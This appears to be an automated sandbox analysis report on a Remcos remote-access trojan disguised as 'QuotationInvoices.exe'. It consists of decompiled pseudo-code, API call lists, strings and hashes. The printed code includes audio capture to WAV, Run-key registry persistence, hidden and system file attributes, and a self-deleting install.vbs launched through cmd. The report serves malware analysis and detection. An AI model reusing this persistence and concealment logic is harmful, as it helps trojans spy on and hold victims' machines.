Part of subcall function 0040F9AE: WaitForSingleObject.KERNEL32(000000FF), ref: 0040F9D1

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046B4F8,0046B4E0), ref: 0040AE2E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AE41
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046B4F8,0046B4E0), ref: 0040AE6F
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046B4F8,0046B4E0), ref: 0040AE7D

Part of subcall function 00409A42: TerminateThread.KERNEL32(Function_0000830D,00000000,0046B4E0,0040AD43,?,0046B4F8,0046B4E0), ref: 00409A51
Part of subcall function 00409A42: UnhookWindowsHookEx.USER32(000403B7), ref: 00409A61
Part of subcall function 00409A42: TerminateThread.KERNEL32(Function_000082F2,00000000,?,0046B4F8,0046B4E0), ref: 00409A73

ShellExecuteW.SHELL32(00000000,open,00000000,00464A0C,00464A0C,00000000), ref: 0040B074
ExitProcess.KERNEL32 ref: 0040B07B

Strings

On Error Resume Next, xrefs: 0040AF0E
Temp, xrefs: 0040AEC6
wend, xrefs: 0040AFCC
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B028
fso.DeleteFile ", xrefs: 0040AF84
"), xrefs: 0040AF29
Remcos, xrefs: 0040AD6D
.vbs, xrefs: 0040AE86
exepath, xrefs: 0040AE0B
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040AD72
open, xrefs: 0040B06E
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040AF00
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040ADC1
fso.DeleteFolder ", xrefs: 0040AFF6
while fso.FileExists(", xrefs: 0040AF3E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-3677834288
Opcode ID: 1030e19734f654cc285084573910673388e029cfd7e4d0e7c684b25463e28387
Instruction ID: 944c2c4454b2da222f5a49bf087b50c8f30476131a3228add06ce60ceab86752
Opcode Fuzzy Hash: 1030e19734f654cc285084573910673388e029cfd7e4d0e7c684b25463e28387
Instruction Fuzzy Hash: DD817D71A002185ACB09F761D856AEF77699F90708F14007FF806B71E3EE7C5D89869E

Uniqueness

Uniqueness Score: -1.00%

Function 004019C8, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004019C8(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46aa9a & 0x0000ffff;
				_t83 = ( *0x46aaa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46aa9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46aa9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46aa9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46aaa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}

0x004019d7
0x004019da
0x004019e1
0x004019e4
0x004019eb
0x004019fe
0x00401a03
0x00401a14
0x00401a1c
0x00401a27
0x00401a2d
0x00401a36
0x00401a3b
0x00401a57
0x00401a66
0x00401a76
0x00401a86
0x00401a95
0x00401aa4
0x00401ab4
0x00401ac4
0x00401ad3
0x00401ae2
0x00401af2
0x00401b02
0x00401b11
0x00401b1f
0x00401b22
0x00000000
0x00401b28
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A30
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A57
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A66
WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A76
WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A86
WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401A95
WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AA4
WriteFile.KERNEL32(00000000,0046AA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AB4
WriteFile.KERNEL32(00000000,0046AA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AC4
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AD3
WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE2
WriteFile.KERNEL32(00000000,0046AAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF2
WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B11

Strings

RIFF, xrefs: 00401A51
data, xrefs: 00401AFC
fmt , xrefs: 00401A80
WAVE, xrefs: 00401A70

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: a41d43b64ec73c4b93159e1acfca60618455a53e5912efce71186941b70c5452
Instruction ID: 5e135e1ca8adfc5cd2bf4d4806e75892afb41a848479d3ed59b5b9c407f775f0
Opcode Fuzzy Hash: a41d43b64ec73c4b93159e1acfca60618455a53e5912efce71186941b70c5452
Instruction Fuzzy Hash: 62413BB5A5021CBAE710DA918D86FFF7ABCEB45B10F500056FB04EA0C0D7B45B05DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A927, Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 324
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A927(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E004179DE( &_v92, __ecx, _t143);
					_t259 = 0x46b4e0;
					E00401E5E(0x46b4e0, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E00401E4F(0x46b510), 0);
					_t143 = _a4;
					_t139 = E00402F9A(_t143,  &_v92, E0040708E( &_v44, 0x46b510, _t268, "\\"), 0x46b510, _t268, _t143);
					_t259 = 0x46b4e0;
					E00401E5E(0x46b4e0, _t138, _t260, _t139);
					E00401E54();
				}
				E00401E54();
				_t152 = E00401E4F(_t259);
				_t67 = 0x46ab08;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Users\jones\Desktop\QuotationInvoices.exe", E00401E4F(_t259), _t153);
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0040A836(0x46b4c8, E00401E4F(0x46b4c8));
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E00402F9A(_t143,  &_v92, E0040412C(_t143,  &_v68, E00438F0F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									E00401E54();
									E0040412C(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0040720A(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E0040412C("\n",  &_v212, "C:\Users\jones\Desktop\QuotationInvoices.exe");
										E00403205(E00402F9A(_t144,  &_v68, E00402F9A(_t144,  &_v116, E00402F24( &_v140, E00402F9A(_t144,  &_v164, E0040412C("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										E00401E54();
										E00401E54();
										E00401E54();
										E00401E54();
										E00401E54();
										E00401E54();
									}
									_t79 = E0040412C(_t144,  &_v116, L"\"\"\", 0");
									E00403205(E00402F9A(_t144,  &_v212, E00402F24( &_v188, E00404303(_t144,  &_v164, E0040412C(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E00401E54();
									E0040720A(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = E00401E4F( &_v92);
									_t92 = E004023D3();
									_t94 = E004172C6(E00401E4F( &_v44), _t92 + _t92, _t91, 0);
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E00401E54();
										return E00401E54();
									} else {
										_t99 = ShellExecuteW(0, L"open", E00401E4F( &_v92), 0x464a0c, 0x464a0c, 0);
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0);
									}
								}
								_t113 = E00401E4F(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46b510;
									SetFileAttributesW(E00401E4F(0x46b510), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E00401E5E(_t259, 0x36, _t260, E004179DE( &_v68, 0x36));
							} else {
								E00401E5E(_t259, _t128, _t260, E00402F9A(_t143,  &_v140, E00402F9A(_t143,  &_v116, E004179DE( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								E00401E54();
								E00401E54();
							}
							E00401E54();
							_t123 = E00401E4F(_t259);
							_t143 = 0x46ab08;
							_t124 = CopyFileW(0x46ab08, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E0040B611(0x46ab08, _t259, 0x46ab08);
								return 0;
							}
						}
						E0040A836(0x46b4c8, E00401E4F(0x46b4c8));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}

0x0040a927
0x0040a934
0x0040a938
0x0040a93a
0x0040a93d
0x0040a940
0x0040a940
0x0040a943
0x0040a946
0x0040a94b
0x0040a94b
0x0040a954
0x0040a99e
0x0040a9a1
0x0040a9a7
0x0040a9ad
0x0040a9b5
0x0040a956
0x0040a95f
0x0040a965
0x0040a97e
0x0040a984
0x0040a98c
0x0040a994
0x0040a999
0x0040a9bd
0x0040a9c9
0x0040a9cb
0x0040a9d0
0x0040a9d0
0x0040a9d6
0x00000000
0x00000000
0x0040a9db
0x0040a9f2
0x0040a9f2
0x0040a9f4
0x0040a9ff
0x0040aa01
0x0040aa2b
0x0040aa31
0x0040aa33
0x0040aae2
0x0040aaee
0x0040aaf3
0x0040aaf8
0x0040aaf9
0x0040ab32
0x0040ab50
0x0040ab59
0x0040ab66
0x0040ab73
0x0040ab78
0x0040ab7c
0x0040ab81
0x0040ab99
0x0040abe6
0x0040abee
0x0040abf6
0x0040ac01
0x0040ac0c
0x0040ac17
0x0040ac22
0x0040ac22
0x0040ac30
0x0040ac72
0x0040ac7d
0x0040ac88
0x0040ac93
0x0040ac9b
0x0040aca3
0x0040acb0
0x0040acbb
0x0040acc4
0x0040acd9
0x0040ace0
0x0040ace2
0x0040ad0d
0x0040ad10
0x00000000
0x0040ace4
0x0040acfb
0x0040ad01
0x0040ad04
0x00000000
0x00000000
0x0040ad07
0x0040ad07
0x0040ace2
0x0040aaff
0x0040ab04
0x0040ab0b
0x0040ab0d
0x0040ab10
0x0040ab10
0x0040ab12
0x0040ab12
0x0040ab15
0x0040ab18
0x0040ab18
0x0040ab1d
0x0040ab21
0x0040ab25
0x0040ab30
0x0040ab30
0x00000000
0x0040ab21
0x0040aa39
0x0040aa3d
0x00000000
0x00000000
0x0040aa43
0x0040aa45
0x0040aa48
0x0040aa48
0x0040aa4b
0x0040aa4e
0x0040aa4e
0x0040aa54
0x0040aa54
0x0040aa5a
0x0040aa5e
0x0040aaab
0x0040aa60
0x0040aa88
0x0040aa93
0x0040aa9b
0x0040aa9b
0x0040aab3
0x0040aabd
0x0040aac3
0x0040aac9
0x0040aacf
0x0040aad1
0x00000000
0x0040aad3
0x0040aad6
0x00000000
0x0040aadb
0x0040aad1
0x0040aa0f
0x00000000
0x0040aa16
0x0040a9dd
0x0040a9e5
0x00000000
0x00000000
0x0040a9e7
0x0040a9ea
0x0040a9f0
0x00000000
0x00000000
0x00000000
0x0040a9f0
0x0040a9f8
0x0040a9fa
0x0040a9fd
0x0040a9fd
0x00000000

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A95F
CopyFileW.KERNEL32(C:\Users\user\Desktop\QuotationInvoices.exe,00000000,00000000,00000000), ref: 0040AA2B
CopyFileW.KERNEL32(C:\Users\user\Desktop\QuotationInvoices.exe,00000000,00000000,00000000), ref: 0040AAC9

Part of subcall function 004179DE: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00417B35

SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB0B
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB30
ShellExecuteW.SHELL32(00000000,open,00000000,00464A0C,00464A0C,00000000), ref: 0040ACFB
ExitProcess.KERNEL32 ref: 0040AD07

Strings

fso.DeleteFile , xrefs: 0040ABA0
\install.vbs, xrefs: 0040AB32
Remcos, xrefs: 0040AA03, 0040AAE2
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040AC37
""", 0, xrefs: 0040AC28
Temp, xrefs: 0040AB37
WScript.Sleep 1000, xrefs: 0040AB5E
C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 0040A9CB, 0040AA26, 0040AAC3, 0040AAC8, 0040AAD3, 0040AB94
open, xrefs: 0040ACF5
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040ACA8
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040AB6B
6, xrefs: 0040AA39

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
String ID: """, 0$6$C:\Users\user\Desktop\QuotationInvoices.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
API String ID: 4018752923-3347235816
Opcode ID: 17dd19bac244732ef0d4abfef4941791fe4df1dcefd9c06f5e027c47af84aca9
Instruction ID: 01fe0519da4aeab39c3fba90120ed8d8c70d54ba115721ba1d4df7776fe9f7f6
Opcode Fuzzy Hash: 17dd19bac244732ef0d4abfef4941791fe4df1dcefd9c06f5e027c47af84aca9
Instruction Fuzzy Hash: 59A1B4716002045ACB18F7A5CC52AEE7366AF54708F54407FF406B71D2EE7C6E89CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 0043DD5C, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043DD5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46900c; // 0x7c295e5c
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x456760;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x4569e0;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x456b60;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E0042F3BB(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0043DAF9(_t172, 1, 4);
					E0043E9A5(_t170);
					_v32 = E0043DAF9(_t172, 0x180, 2);
					E0043E9A5(_t170);
					_v36 = E0043DAF9(_t172, 0x180, 1);
					E0043E9A5(_t170);
					_v40 = E0043DAF9(_t172, 0x180, 1);
					E0043E9A5(_t170);
					_t197 = E0043DAF9(_t172, 0x101, 1);
					_v52 = _t197;
					E0043E9A5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E0043E9A5(_v44);
						E0043E9A5(_v32);
						E0043E9A5(_v36);
						E0043E9A5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E00442FBC(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E00442FBC(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E00447A8C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E0043E9A5( *(_t215 + 0x90) - 0xfe);
										E0043E9A5( *(_t215 + 0x94) - 0x80);
										E0043E9A5( *(_t215 + 0x98) - 0x80);
										E0043E9A5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E0043E9A5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E00449D60(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x0043dd64
0x0043dd6b
0x0043dd70
0x0043dd73
0x0043dd76
0x0043dd79
0x0043dd7c
0x0043dd82
0x0043dd85
0x0043dd88
0x0043dd8b
0x0043dd8e
0x0043dd93
0x0043e0b3
0x0043e0b5
0x0043e0b7
0x0043e0b7
0x0043e0ba
0x0043e0c0
0x0043e0c2
0x0043e0c8
0x0043e0ce
0x0043e0d8
0x0043e0e2
0x0043e0e9
0x0043e0f9
0x0043e0f9
0x0043dd99
0x0043dd9c
0x0043dda1
0x0043ddbf
0x0043ddc9
0x0043ddcc
0x0043dddf
0x0043dde2
0x0043ddf0
0x0043ddf3
0x0043de01
0x0043de04
0x0043de15
0x0043de18
0x0043de1b
0x0043de20
0x0043de26
0x0043e07a
0x0043e07d
0x0043e085
0x0043e08d
0x0043e095
0x0043e09f
0x0043e09f
0x00000000
0x0043de4f
0x0043de4f
0x0043de51
0x0043de51
0x0043de54
0x0043de55
0x0043de6b
0x00000000
0x00000000
0x0043de71
0x0043de74
0x0043de77
0x00000000
0x00000000
0x0043de84
0x0043de87
0x0043de8a
0x0043dea7
0x0043deac
0x0043deaf
0x0043deb1
0x00000000
0x00000000
0x0043decb
0x0043dedb
0x0043dee0
0x0043dee5
0x00000000
0x00000000
0x0043deef
0x0043df1c
0x0043df32
0x0043df35
0x0043df3a
0x0043df3f
0x00000000
0x00000000
0x0043df45
0x0043df4a
0x0043df50
0x0043df53
0x0043df56
0x0043df59
0x0043df5c
0x0043df5f
0x0043df66
0x0043df69
0x0043df6c
0x0043df6e
0x0043df74
0x0043df77
0x0043df79
0x0043dfbb
0x0043dfbd
0x0043dfc6
0x0043dfcb
0x0043dfce
0x0043dfd8
0x0043dfda
0x0043dfdd
0x0043dfdf
0x0043dfe8
0x0043dfea
0x0043dfec
0x0043dfed
0x0043dff8
0x0043dffd
0x0043e001
0x0043e00f
0x0043e022
0x0043e030
0x0043e03b
0x0043e040
0x0043e001
0x0043e043
0x0043e046
0x0043e04c
0x0043e055
0x0043e05a
0x0043e063
0x0043e06c
0x0043e075
0x0043e0a0
0x0043e0a3
0x00000000
0x0043df80
0x0043df80
0x0043df83
0x0043df83
0x0043df87
0x00000000
0x00000000
0x0043df89
0x0043df92
0x0043dfb0
0x0043dfb0
0x0043dfb6
0x00000000
0x00000000
0x00000000
0x0043dfb6
0x0043df9a
0x0043df9d
0x0043dfa2
0x0043dfa3
0x0043dfa6
0x0043dfac
0x00000000
0x0043df9d
0x00000000
0x0043dfb8
0x0043def6
0x0043def6
0x0043def9
0x0043def9
0x0043defd
0x00000000
0x00000000
0x0043deff
0x0043df03
0x0043df10
0x0043df08
0x0043df0c
0x0043df0c
0x0043df0d
0x0043df0d
0x0043df14
0x0043df17
0x0043df1a
0x00000000
0x00000000
0x00000000
0x0043df1a
0x00000000
0x0043def9
0x0043deef
0x0043de26
0x0043ddaf
0x0043ddb4
0x0043ddb9
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0043DDCC
_free.LIBCMT ref: 0043DDE2
_free.LIBCMT ref: 0043DDF3
_free.LIBCMT ref: 0043DE04
_free.LIBCMT ref: 0043DE1B
GetCPInfo.KERNEL32(?,?), ref: 0043DE63

Part of subcall function 00449D60: _free.LIBCMT ref: 00449DCB

_free.LIBCMT ref: 0043E00F
_free.LIBCMT ref: 0043E022
_free.LIBCMT ref: 0043E030
_free.LIBCMT ref: 0043E03B
_free.LIBCMT ref: 0043E07D
_free.LIBCMT ref: 0043E085
_free.LIBCMT ref: 0043E08D
